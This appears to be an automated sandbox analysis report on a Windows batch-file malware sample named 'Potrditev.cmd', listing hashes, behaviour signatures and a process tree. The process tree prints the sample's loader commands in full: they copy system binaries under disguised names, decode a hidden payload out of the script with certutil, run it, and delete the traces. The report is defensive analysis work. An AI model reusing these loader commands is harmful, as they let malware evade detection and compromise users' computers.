Analysis
- max time kernel: 141s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 04-08-2024 18:37

Static task: static1

Behavioral task: behavioral1
- Sample: Potrditev.cmd
- Resource: win7-20240729-en

Behavioral task: behavioral2
- Sample: Potrditev.cmd
- Resource: win10v2004-20240802-en
General
- Target: Potrditev.cmd
- Size: 2.8MB
- MD5: 306e6e3743666b8f5fedb0127b041883
- SHA1: 53ac1756ee69296be5f5c99ee18b1d1cb70369d4
- SHA256: 20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc
- SHA512: 233d9861fe624b707fe4b89435cf27f1216006e97b97374fa159574d63ca6db351fc2cba454554c82d210ca6f8a4f8be383c6723eab0a54ac1a2e984317804c1
- SSDEEP: 24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrQf3m29Yqk:Rr0jYNi8DrApkpUNLgVDzNVpeIh/c2B
Malware Config
Signatures
- Executes dropped EXE (8 IoCs)
  pid   Process
  2272  alpha.exe
  2800  alpha.exe
  2956  kn.exe
  2948  alpha.exe
  2420  kn.exe
  2664  CLEAN.COM
  1352  alpha.exe
  2636  alpha.exe
- Loads dropped DLL (11 IoCs)
  pid   Process
  2248  cmd.exe
  2248  cmd.exe
  2800  alpha.exe
  2248  cmd.exe
  2948  alpha.exe
  2248  cmd.exe
  2248  cmd.exe
  1308  WerFault.exe
  1308  WerFault.exe
  1308  WerFault.exe
  1308  WerFault.exe
- Program crash (1 IoC)
  pid   pid_target  Process       procid_target
  1308  2664        WerFault.exe  39
- System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  CLEAN.COM
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   Process
  2664  CLEAN.COM
- Suspicious use of WriteProcessMemory (35 IoCs)
  description                        pid   Process    procid_target
  PID 2248 wrote to memory of 2084   2248  cmd.exe    32
  PID 2248 wrote to memory of 2084   2248  cmd.exe    32
  PID 2248 wrote to memory of 2084   2248  cmd.exe    32
  PID 2248 wrote to memory of 2272   2248  cmd.exe    33
  PID 2248 wrote to memory of 2272   2248  cmd.exe    33
  PID 2248 wrote to memory of 2272   2248  cmd.exe    33
  PID 2272 wrote to memory of 2696   2272  alpha.exe  34
  PID 2272 wrote to memory of 2696   2272  alpha.exe  34
  PID 2272 wrote to memory of 2696   2272  alpha.exe  34
  PID 2248 wrote to memory of 2800   2248  cmd.exe    35
  PID 2248 wrote to memory of 2800   2248  cmd.exe    35
  PID 2248 wrote to memory of 2800   2248  cmd.exe    35
  PID 2800 wrote to memory of 2956   2800  alpha.exe  36
  PID 2800 wrote to memory of 2956   2800  alpha.exe  36
  PID 2800 wrote to memory of 2956   2800  alpha.exe  36
  PID 2248 wrote to memory of 2948   2248  cmd.exe    37
  PID 2248 wrote to memory of 2948   2248  cmd.exe    37
  PID 2248 wrote to memory of 2948   2248  cmd.exe    37
  PID 2948 wrote to memory of 2420   2948  alpha.exe  38
  PID 2948 wrote to memory of 2420   2948  alpha.exe  38
  PID 2948 wrote to memory of 2420   2948  alpha.exe  38
  PID 2248 wrote to memory of 2664   2248  cmd.exe    39
  PID 2248 wrote to memory of 2664   2248  cmd.exe    39
  PID 2248 wrote to memory of 2664   2248  cmd.exe    39
  PID 2248 wrote to memory of 2664   2248  cmd.exe    39
  PID 2248 wrote to memory of 1352   2248  cmd.exe    40
  PID 2248 wrote to memory of 1352   2248  cmd.exe    40
  PID 2248 wrote to memory of 1352   2248  cmd.exe    40
  PID 2248 wrote to memory of 2636   2248  cmd.exe    41
  PID 2248 wrote to memory of 2636   2248  cmd.exe    41
  PID 2248 wrote to memory of 2636   2248  cmd.exe    41
  PID 2664 wrote to memory of 1308   2664  CLEAN.COM  42
  PID 2664 wrote to memory of 1308   2664  CLEAN.COM  42
  PID 2664 wrote to memory of 1308   2664  CLEAN.COM  42
  PID 2664 wrote to memory of 1308   2664  CLEAN.COM  42
Processes (process tree; indentation shows parent/child, numbers show depth)

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd"
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory
   PID: 2248

   2. C:\Windows\System32\extrac32.exe
      Command line: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      PID: 2084

   2. C:\Users\Public\alpha.exe
      Command line: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 2272

      3. C:\Windows\system32\extrac32.exe
         Command line: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
         PID: 2696

   2. C:\Users\Public\alpha.exe
      Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 2800

      3. C:\Users\Public\kn.exe
         Command line: C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
         - Executes dropped EXE
         PID: 2956

   2. C:\Users\Public\alpha.exe
      Command line: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 2948

      3. C:\Users\Public\kn.exe
         Command line: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
         - Executes dropped EXE
         PID: 2420

   2. C:\Users\Public\Libraries\CLEAN.COM
      Command line: C:\Users\Public\Libraries\CLEAN.COM
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
      PID: 2664

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 700
         - Loads dropped DLL
         - Program crash
         PID: 1308

   2. C:\Users\Public\alpha.exe
      Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE
      PID: 1352

   2. C:\Users\Public\alpha.exe
      Command line: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
      - Executes dropped EXE
      PID: 2636
Network
MITRE ATT&CK Enterprise v15
Downloads